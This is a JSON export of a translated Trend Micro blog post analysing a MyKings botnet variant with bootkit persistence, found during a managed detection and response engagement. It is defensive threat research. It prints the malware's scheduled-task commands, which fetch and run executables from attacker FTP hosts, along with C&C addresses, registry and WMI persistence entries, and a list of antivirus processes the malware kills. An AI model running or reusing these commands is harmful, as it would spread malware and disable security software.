{"id":61824,"date":"2019-08-29T09:00:13","date_gmt":"2019-08-29T01:00:13","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=61824"},"modified":"2019-09-25T18:09:38","modified_gmt":"2019-09-25T10:09:38","slug":"mdr-%e6%89%be%e5%88%b0%e9%9a%b1%e8%97%8f%e5%9c%a8%e6%9f%90%e5%85%ac%e5%8f%b8%e7%b3%bb%e7%b5%b1%e5%85%a72%e5%b9%b4%e7%9a%84mykings%e8%ae%8a%e7%a8%ae","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=61824","title":{"rendered":"MDR finds a MyKings variant that lurked in a company's systems for 2 years"},"content":{"rendered":"\n<div class=\"wp-block-image\"><figure class=\"alignleft\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/06\/rootkit-feature-200x200.png\" alt=\"\"\/><\/figure><\/div>\n\n\n\n
<p>When an electronics company in the Asia-Pacific region onboarded the <a href=\"https:\/\/t.rend.tw\/?i=NzkzMA\">Managed Detection and Response (<em>MDR<\/em>)&nbsp;<\/a> service in May, <a href=\"https:\/\/www.trendmicro.com\/zh_tw\/business\/products\/network\/advanced-threat-protection.html\">Trend Micro's Deep Discovery Inspector<\/a> detected suspicious activity related to <a rel=\"noreferrer noopener\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=54909\" target=\"_blank\">EternalBlue<\/a>, an exploit previously used by the <a href=\"https:\/\/blog.trendmicro.com.tw\/?cat=3220\">WannaCry ransomware<\/a>. After discovering this, we sent the company a first alert notifying it of the potential threat.<\/p>\n\n\n\n
<p>A few days later we managed to find evidence that a computer inside the company was establishing malicious communication with the attackers: one of the company's machines was connecting to the following URLs (which we confirmed to be malware sources):<\/p>\n\n\n\n<ul><li>hxxp:\/\/js[.]mykings.top:280\/v[.]sct<\/li><li>hxxp:\/\/js[.]mykings.top:280\/helloworld[.]msi<\/li><\/ul>\n\n\n\n
<p>The URLs contain the word \"mykings\", similar to the command-and-control (C&amp;C) servers we saw when we <a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly\/\">analyzed the botnet<\/a> in August 2017. This gave us the first clue to the identity of this threat.<\/p>\n\n\n\n
<p>In addition, we found that the attackers had tampered with the system registry to establish persistence. The newly added registry keys were responsible for C&amp;C communication with the URLs mentioned above:<\/p>\n\n\n\n<ul><li>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u201d -Name \u201cstart\u201d<\/li><li>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u201d -Name \u201cstart1\u201d<\/li><li>HKLM\\SOFTWARE\\Microsoft\\Shared Tools\\MSConfig\\startupreg\u201d -Name \u201cstart\u201d<\/li><li>HKLM\\SOFTWARE\\Microsoft\\Shared Tools\\MSConfig\\startupreg\u201d -Name \u201cstart1\u201d<\/li><\/ul>\n\n\n\n
<h2 class=\"wp-block-heading\"><strong>The malware had been hiding in the company's systems for about 2 years before being discovered<\/strong><\/h2>\n\n\n\n
<p>Digging deeper, we found that these registry values had been added in 2017, showing that the malware had been hiding in the company's systems for about two years before being discovered. This created another problem, because the timeline matters for determining what MyKings actually did on the system. Many botnet components (including C&amp;C server URLs and download URLs) are short-lived and disappear easily. Unlike malware that uses embedded URLs and files, MyKings is tied to scripts and downloads everything it needs from remote servers.<\/p>\n\n\n\n<!--more-->\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-1.png\" alt=\"Figure 1. The registry entries that were added in 2017\"\/><\/figure>\n\n\n\n<p>Figure 1. The registry entries added in 2017<\/p>\n\n\n\n
<p>During the investigation we also confirmed several other persistence mechanisms, consistent with our 2017 research. Besides the autorun registry keys, we also found scheduled tasks and Windows Management Instrumentation (WMI) objects (see Tables 1 and 2):<\/p>\n\n\n\n
<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td><strong>Task name<\/strong><\/td><td><strong>Command string<\/strong><\/td><\/tr><tr><td>Mysa<\/td><td>cmd \/c echo open down[.]mysking[.]info&gt;s&amp;echo test&gt;&gt;s&amp;echo 1433&gt;&gt;s&amp;echo binary&gt;&gt;s&amp;echo get a.exe&gt;&gt;s&amp;echo bye&gt;&gt;s&amp;ftp -s:s&amp;a.exe\u201d}<\/td><\/tr><tr><td>Mysa1<\/td><td>rundll32.exe c:\\\\windows\\\\debug\\\\item.dat<\/td><\/tr><tr><td>Mysa2<\/td><td>cmd \/c echo open ftp[.]ftp0118[.]info&gt;p&amp;echo test&gt;&gt;p&amp;echo 1433&gt;&gt;p&amp;echo get s.dat c:\\\\windows\\\\debug\\\\item.dat&gt;&gt;p&amp;echo bye&gt;&gt;p&amp;ftp -s:p\u201d}<\/td><\/tr><tr><td>Mysa3<\/td><td>cmd \/c echo open ftp[.]ftp0118[.]info&gt;ps&amp;echo test&gt;&gt;ps&amp;echo 1433&gt;&gt;ps&amp;echo get s.rar c:\\\\windows\\\\help\\\\lsmosee.exe&gt;&gt;ps&amp;echo bye&gt;&gt;ps&amp;ftp -s:ps&amp;c:\\\\windows\\\\help\\\\lsmosee.exe\u201d}<\/td><\/tr><tr><td>Ok<\/td><td>rundll32.exe c:\\\\windows\\\\debug\\\\ok.dat<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>Table 1. Scheduled tasks and their corresponding command strings<\/p>\n\n\n\n
<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>WMI object<\/td><td>Notes<\/td><\/tr><tr><td>__EventConsumer Name: fuckyoumm2_consumer<\/td><td><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-2.png\">Code snippet of the EventConsumer<\/a><\/td><\/tr><tr><td>__EventFilter Name: fuckyoumm2_filter<\/td><td>Query: select * from __timerevent where timerid=\u201dfuckyoumm2_itimer\u201d<\/td><\/tr><tr><td>__FilterToConsumerBinding<\/td><td>__FilterToConsumerBinding.Consumer=\u201d\\\\\\\\.\\\\root\\\\subscription:ActiveScriptEventConsumer.Name=\\\u201dfuckyoumm2_consumer\\\u201d\u201d,Filter=\u201d\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\\u201dfuckyoumm2_filter\\\u201d\u201d<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>Table 2. WMI objects and related information<\/p>\n\n\n\n
<p>Our analysis shows that this variant retained its basic infrastructure. There are still some notable points, however, which we discuss in detail in the technical analysis.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Providing context for the attack<\/strong><\/h2>\n\n\n\n
<p>The rapid spread of botnets has become one of the most serious cybersecurity problems of recent years. As of early 2018, MyKings alone had <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/smominru-botnet-infected-over-500-000-windows-machines\/\">infected over 500,000 machines and mined nearly US$2.3 million<\/a>. In the following months, MyKings kept changing its targets and infection methods.<\/p>\n\n\n\n
<p><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">Trend Micro<\/a>'s regional analysis in 2017 showed that most infections that year occurred in the Asia-Pacific region. The timing of the attack we found may indicate that it was part of the 2017 campaign.<\/p>\n\n\n\n
<p>One of the main challenges the organization faced in this incident was piecing together all the seemingly unrelated indicators to get a clearer picture of the attack. Because the infection occurred in 2017, the malware had enough time to operate and deliver a variety of malicious files, which made things even more complicated.<\/p>\n\n\n\n
<p>Looking at our network sensors, someone without knowledge or experience of MyKings might assume the attack used multiple malware families from different threat actors. Figure 2 shows that different types of malware were involved, such as backdoors, cryptocurrency miners and Trojans.<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-3.png\" alt=\"Figure 2. The attack as shown on the Trend Micro Deep Discovery Inspector dashboard\"\/><\/figure>\n\n\n\n<p>Figure 2. The attack as shown on the Trend Micro Deep Discovery Inspector dashboard<\/p>\n\n\n\n
<p>In addition, MyKings uses multiple persistence mechanisms, which makes it hard to remove from infected machines. We elaborate on this in the next section.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Technical analysis<\/strong><\/h2>\n\n\n\n<p><strong>Using a bootkit as a persistence mechanism<\/strong><\/p>\n\n\n\n
<p>When we <a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly\/\">first investigated MyKings in 2017<\/a>, we focused on how the cryptocurrency-mining botnet used WMI as a persistence mechanism. Like Mirai, MyKings seems to keep changing its infection routine. The variant we analyzed in this incident uses more than one persistence mechanism, as described in the previous section. Besides WMI, it also uses the registry, scheduled tasks and a bootkit; the most notable of these is the bootkit (detected by Trend Micro as Trojan.Win32.FUGRAFA.AB).<\/p>\n\n\n\n
<p>The bootkit uses the file name <em>lsmosee.exe<\/em> or <em>s.rar<\/em> (according to a <a href=\"https:\/\/www.lianchaguan.com\/archives\/8036\">report<\/a> from this year, the code can also be found in <em>ok.exe<\/em>, but we could not confirm this because the URL was no longer accessible when we conducted our investigation). It first gains control of the disk and checks the first sector, which normally contains the MBR, and then checks whether its code has already been written to the disk.<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-4.png\" alt=\"Figure 3. The bootkit checking the MBR\"\/><\/figure>\n\n\n\n<p>Figure 3. The bootkit checking the MBR<\/p>\n\n\n\n
<p>Next, it checks whether the MBR has already been infected by another bootkit and, if so, tries to restore the MBR before continuing with its modifications. The bootkit then copies the original MBR to the second sector, overwrites the existing MBR with its own boot code, and continues writing the rest of the code that will run at boot time to the disk.<\/p>\n\n\n\n<p><strong>Kernel-mode routine<\/strong><\/p>\n\n\n\n
<p>The bootkit first reads the code located in the third sector and loads it to a higher address, 0x8f000 in this case. The malicious code is distributed across 60 sectors in total.<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-4-1.png\" alt=\"Figure 4. Distribution of the code to 60 sectors\"\/><\/figure>\n\n\n\n<p>Figure 4. Distribution of the code across 60 sectors<\/p>\n\n\n\n
<p>The main purpose of the boot code is persistence and self-protection. It also writes the malware code into user-space processes using asynchronous procedure call (APC) injection. To do this, it changes the address of INT 15 in the interrupt descriptor table (shown below), so that when INT 15 is called, execution is redirected to 0x8F00:0x0247.<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-5.png\" alt=\"Figure 5. Changing the address of INT15 in the Interrupt Descriptor Table\"\/><\/figure>\n\n\n\n<p>Figure 5. Changing the address of INT 15 in the interrupt descriptor table<\/p>\n\n\n\n
<p>After this is done, the original MBR (stored in the second sector) is executed before the system starts.<\/p>\n\n\n\n
<p>Once INT 15 is called (most likely during the system boot process), the malware's boot code further modifies several kernel-level functions. Finally, it performs APC injection and terminates all the antivirus processes listed in Table 3.<\/p>\n\n\n\n
<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>avp.exe<\/td><td>acaegmgr.exe<\/td><td>sapissvc.exe<\/td><\/tr><tr><td>zhudongfangyu.exe<\/td><td>Rtvscan.exe<\/td><td>scsecsvc.exe<\/td><\/tr><tr><td>superkiller.exe<\/td><td>avastsvc.exe<\/td><td>avgsvc.exe<\/td><\/tr><tr><td>360sd.exe<\/td><td>bdagent.exe<\/td><td>aycagentsrv.ayc<\/td><\/tr><tr><td>360safe.exe<\/td><td>mcshield.exe<\/td><td>liveupdate360.exe<\/td><\/tr><tr><td>360rps.exe<\/td><td>mcsvhost.exe<\/td><td>360rp<\/td><\/tr><tr><td>kavfs.exe<\/td><td>mfefire.exe<\/td><td>qqpctray.exe<\/td><\/tr><tr><td>sragent.exe<\/td><td>mfemms.exe<\/td><td>Mcshield.exe<\/td><\/tr><tr><td>QQPCRTP.exe<\/td><td>arwsrvc.exe<\/td><td>SHSTAT.EXE<\/td><\/tr><tr><td>systemaidbox.exe<\/td><td>dwarkdaemon.exe<\/td><td>naprdmgr.exe<\/td><\/tr><tr><td>avgnt.exe<\/td><td>vssery.exe<\/td><td>avgui.exe<\/td><\/tr><tr><td>avengine.exe<\/td><td>avguard.exe<\/td><td>gziface.exe<\/td><\/tr><tr><td>msmpeng.exe<\/td><td>ahnsdsv.exe<\/td><td>ekrn.exe<\/td><\/tr><tr><td>nissrv.exe<\/td><td>asdsvc.exe<\/td><td>dwengine.exe<\/td><\/tr><tr><td>msseces.exe<\/td><td>kavfswp.exe<\/td><td>spideragent.exe<\/td><\/tr><tr><td>ccSvcHst.exe<\/td><td>mbamservice.exe<\/td><td>bdagent.exe<\/td><\/tr><tr><td>ekrn.exe<\/td><td>mbam.exe<\/td><td>smsvchost.exe<\/td><\/tr><tr><td>nod32krn.exe<\/td><td>qhpisvr.exe<\/td><td>avastui.exe<\/td><\/tr><tr><td>aswidsagenta.exe<\/td><td>quhlpsvc.exe<\/td><td>ksafe.exe<\/td><\/tr><tr><td>afwserv.exe<\/td><td>savservice.exe<\/td><td>&nbsp;<\/td><\/tr><tr><td>v3svc.exe<\/td><td>hipsmain.exe<\/td><td>&nbsp;<\/td><\/tr><tr><td>&nbsp;<\/td><td>hipsdaemon.exe<\/td><td>&nbsp;<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>Table 3. List of processes terminated by the bootloader<\/p>\n\n\n\n
<p>The process into which the code is injected (Winlogon, Explorer or Svchost) varies depending on conditions such as the Windows version.<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-6.png\" alt=\"Figure 6. The code being injected into explorer.exe\"\/><\/figure>\n\n\n\n<p>Figure 6. The code being injected into explorer.exe<\/p>\n\n\n\n<p>If this fails, it injects into svchost.exe instead.<\/p>\n\n\n\n<p><strong>User-mode processes (winlogon.exe\/explorer.exe\/svchost.exe)<\/strong><\/p>\n\n\n\n
<p>The injected user-space code mainly downloads a piece of code from a C&amp;C server whose address is obtained from <em>hxxp[:\/\/]www[.]upme0611[.]info\/address[.]txt<\/em>. The contents of <em>address.txt<\/em> change over time. During our testing, it contained the following:<\/p>\n\n\n\n
<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td><em>[main]<\/em><br><em>count=6<\/em><br><em>ip1=http[:\/\/]208.110.71.194<\/em><br><em>ip2=http[:\/\/]80.85.152.247<\/em><br><em>ip3=http[:\/\/]66.117.2.182<\/em><br><em>ip4=http[:\/\/]70.39.124.70<\/em><br><em>ip5=http[:\/\/]150.107.76.227<\/em><br><em>ip6=http[:\/\/]103.213.246.23<\/em><br><em>[update]<\/em><br><em>count=6<\/em><br><em>ip1=http[:\/\/]208.110.71.194<\/em><br><em>ip2=http[:\/\/]80.85.152.247<\/em><br><em>ip3=http[:\/\/]66.117.2.182<\/em><br><em>ip4=http[:\/\/]70.39.124.70<\/em><br><em>ip5=http[:\/\/]150.107.76.227<\/em><br><em>ip6=http[:\/\/]103.213.246.23<\/em><\/td><\/tr><\/tbody><\/table>\n\n\n\n
<p>After establishing a connection to the C&amp;C server, it downloads shellcode, <em>TestMsg.tmp<\/em>, from one of the servers above, which the infected process then executes. The shellcode refers to <em>cloud.txt<\/em>, which contains the following text and varies each time:<\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>[config]<br>url=about:blank<br>exe=http[:\/\/]185.22.172.13\/upsupx.exe<\/td><\/tr><\/tbody><\/table>\n\n\n\n
<p>The file <em>upsupx.exe<\/em> is downloaded, saved as <em>C:\\Windows\\Temp\\conhost.exe<\/em> and executed.<\/p>\n\n\n\n<p><strong>Main downloader (upsupx.exe\/conhost.exe)<\/strong><\/p>\n\n\n\n<p>The HTTP requests the malware makes to obtain C&amp;C server addresses and download other payloads are summarized below:<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-6-1.png\" alt=\"Figure 7. HTTP requests sent by MyKings to the C&amp;C server\"\/><\/figure>\n\n\n\n<p>Figure 7. HTTP requests sent by MyKings to the C&amp;C server<\/p>\n\n\n\n
<p>It creates <em>C:\\Program Files\\Common Files\\xpdown.dat<\/em>, which contains a list of C&amp;C servers. The initial list is as follows:<\/p>\n\n\n\n<ul><li>ok[.]xmr6b[.]ru<\/li><li>74[.]222[.]14[.]61<\/li><li>45[.]58[.]135[.]106<\/li><li>103[.]95[.]28[.]54<\/li><li>103[.]213[.]246[.]23<\/li><\/ul>\n\n\n\n
<p>It then selects one of these servers to download an updated <em>xpdown.dat<\/em>. In our analysis it downloaded from the server 45[.]58[.]135[.]106, and the file contained the following:<\/p>\n\n\n\n<ul><li>Ok[.]xmr6b[.]ru<\/li><li>61<\/li><li>74[.]222[.]14[.]61<\/li><li>139[.]5[.]177[.]10<\/li><li>45[.]58[.]135[.]106<\/li><\/ul>\n\n\n\n
<p>Once a server is selected, it sends HTTP requests to {server}\/ok\/down[.]html, {server}\/ok\/64[.]html and {server}\/ok\/vers[.]html, as shown below:<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-7.png\" alt=\"Figure 8. HTTP requests sent to the other servers\"\/><\/figure>\n\n\n\n<p>Figure 8. HTTP requests sent to the other servers<\/p>\n\n\n\n
<p>We tested on a 32-bit machine, and the malware continued downloading from 45[.]58[.]135[.]106. The download server may differ, however, depending on whether the infected machine is 32-bit or 64-bit.<\/p>\n\n\n\n
<p>It then downloads <em>kill.txt<\/em>, a list of processes to terminate, before finally obtaining the list of files to download and execute from <em>downs.txt<\/em>:<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-8.png\" alt=\"Figure 9. Downloading downs.txt\"\/><\/figure>\n\n\n\n<p>Figure 9. Downloading downs.txt<\/p>\n\n\n\n
<p>Further inspection of these downloaded files shows that their purpose is to repeat the infection cycle when the system restarts. Deleting the visible persistence mechanisms does not fully eliminate the infection. <em>Msief.exe<\/em> is a self-extracting archive containing the batch file <em>c3.bat<\/em>, which sets up all the scheduled task, WMI and registry autostart entries.<\/p>\n\n\n\n
<h2 class=\"wp-block-heading\"><strong>How Managed Detection and Response helps deal with botnets like MyKings<\/strong><\/h2>\n\n\n\n
<p>In situations like this, an outsourced security service such as Trend Micro <a href=\"https:\/\/www.trendmicro.com\/en_ph\/business\/products\/user-protection\/sps\/endpoint\/managed-detection-response.html\">Managed Detection and Response<\/a> becomes a valuable asset. MDR provides the ability to investigate incidents and analyze threats and, more importantly, to correlate seemingly unrelated indicators to get the full picture of an incident and provide context for the attack.<\/p>\n\n\n\n
<p>The benefit of this service is especially clear in this case, where the infection went undetected for two years. The tools we used and our familiarity with MyKings allowed us to quickly identify the threat and then provide remediation strategies to the affected company.<\/p>\n\n\n\n
<p>Security experts with extensive experience and expertise in sophisticated security tools can identify the infection chain faster and more effectively, correlating URL detections, exploits, autostart mechanisms and malicious files. The diagrams below illustrate how security tools can be used to concisely describe a botnet as complex as MyKings.<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-9.png\" alt=\"Figure 10. Bootkit installation chain showing access to DR0 (MBR)\"\/><\/figure>\n\n\n\n<p>Figure 10. Bootkit installation chain showing access to DR0 (MBR)<\/p>\n\n\n\n
<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-10.png\" alt=\"Figure 11. The infection chain upon restart, with the persistence mechanisms like WMIC.exe, schtasks.exe, and reg.exe clearly visible\"\/><\/figure>\n\n\n\n<p>Figure 11. The infection chain upon restart, with persistence mechanisms such as WMIC.exe, schtasks.exe and reg.exe clearly visible<\/p>\n\n\n\n
<p>Besides being well versed in internal and external threat intelligence sources, the Trend Micro <a href=\"https:\/\/www.trendmicro.com\/zh_tw\/business\/products\/user-protection\/sps\/endpoint\/managed-detection-response.html\">MDR<\/a> team also has experience with Trend Micro's advanced security solutions, including <a href=\"https:\/\/www.trendmicro.com\/zh_tw\/business\/products\/network\/advanced-threat-protection.html\">Trend Micro's Deep Discovery Inspector<\/a>, which can detect lateral movement of threats within the organization.<\/p>\n\n\n\n
<h2 class=\"wp-block-heading\"><strong>Indicators of Compromise (IoCs)<\/strong><\/h2>\n\n\n\n
<p>@Original source: <a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/uncovering-a-mykings-variant-with-bootloader-persistence-via-managed-detection-and-response\/\">Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response<\/a> Authors: Miguel Ang, Erika Mendoza and Buddy Tancio (Trend Micro)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>When an electronics company in the Asia-Pacific region onboarded the Managed Detection and Response (MDR) service in May, 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[3877,1268,11],"tags":[4036,4396,2344,23],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/61824"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=61824"}],"version-history":[{"count":0,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/61824\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=61824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=61824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&po
st=61824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}